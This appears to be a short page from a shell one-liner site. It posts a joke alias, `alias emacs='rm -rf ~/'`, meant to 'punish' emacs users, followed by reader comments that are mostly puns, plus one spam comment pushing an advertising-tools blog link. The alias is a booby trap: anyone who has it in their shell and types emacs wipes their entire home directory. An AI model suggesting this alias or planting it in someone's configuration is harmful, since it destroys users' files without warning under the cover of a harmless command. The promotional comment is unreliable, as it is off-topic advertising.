Punish people for trying to use inferior software

alias emacs='rm -rf ~/'

2009-02-05 17:41:51

What Others Think

how vi ndictive!
jtrip · 832 weeks and 4 days ago
why the vi triol?
themensch · 832 weeks and 4 days ago
Holy S#$%, Jesus is online, we invented the internet to get away from you.'
senthil · 832 weeks and 4 days ago
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xafanih532 · 32 weeks and 1 day ago
Punishing people for using inferior software isn't a productive approach. Instead, it's more effective to educate and provide alternatives. For example, platforms like Adthena, BrandVerity, and AdPolice offer advanced solutions for digital advertising management. You can explore these options at https://bluepear.net/blog/adthena-brandverity-adpolice-alternatives. Encouraging informed choices benefits everyone.
ClaudeVest · 4 weeks and 4 days ago

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